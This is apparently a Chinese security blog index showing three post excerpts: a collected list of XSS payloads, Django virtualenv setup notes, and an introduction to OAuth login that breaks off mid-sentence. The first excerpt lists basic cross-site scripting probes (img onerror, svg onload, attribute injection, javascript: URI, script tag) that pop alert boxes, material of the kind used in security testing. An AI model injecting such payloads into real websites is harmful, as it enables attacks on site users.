xss fuck收集的payload<img src=x onerror=alert(1)></img> <svg/onload=alert(1)></svg> " onmouseover=alert(1) a=" javascript:alert(1) <script>alert(1)</script> <hr>

django开发 开发能力太弱了，学学django的开发…. 0x00 环境搭建生成虚拟环境，在其中的环境配置不会影响主配置 vitualenvpip install virtualenv virtualenv my_env //生成虚拟目录 source my_env/bin/activate //激活环境 source my_env/bin/deactivate //禁用

账户安全权限管理Oauth 随着各类web应用层出不穷，为了让权限管理和访问控制更方便，引入了oauth体系，我们在访问应用时可以通过第三方应用授权来登录，如微信支付宝登录。 用户点击登录 // 告诉login页面我要用第三方平台上你 然后这个login页面就会回答你： 好的你去跟老大哥说下吧，你要告诉这个地址三件事： 1.是我让你来的 client_id 2.用code授权模式